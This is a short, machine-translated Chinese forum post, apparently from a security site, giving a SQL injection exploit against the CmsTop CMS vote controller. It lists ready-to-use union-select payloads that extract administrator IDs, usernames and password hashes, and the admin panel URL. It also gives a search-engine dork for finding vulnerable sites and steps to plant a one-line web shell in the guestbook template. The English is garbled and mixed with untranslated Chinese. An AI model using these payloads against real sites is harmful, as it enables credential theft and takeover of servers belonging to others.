cmstop through the kill injection vulnerability-vulnerability warning-the black bar safety net

Play for a few months this vulnerability.

See the nine zones there ztz large cattle released out exp.

漏洞 文件 /apps/vote/controller/vote.php

app.xxx.com/?app=vote&controller=vote&action=total&contentid=1

To obtain an administrator id

? app=vote&controller=vote&action=total&contentid=1 and 1=2 union select userid from cmstop_admin where departmentid=2 limit 0,1;#

Get to the bottom management id is what you write yourself?

? app=vote&controller=vote&action=total&contentid=1 and 1=2 union select concat(username,char(0x3d),password) from cmstop_member where userid=1;#

Read background address

? app=vote&controller=vote&action=total&contentid=1%20and%2 0 1=2%20union%20select%20url%20from%20cmstop_mymenu%20where%2 0 1=1%20limit%200,1;%2 3

cmstop only app this a Live script

About how to find this dynamic Station

site:xxx.com inurl:roll.php

Database file

cmstop/config/db.php

About to get shell

The administrator account into the background directly after the template inside the guestbook template is inserted in a word

然后 访问 app.xxx.com/?app=guestbook

Large cow study on the go.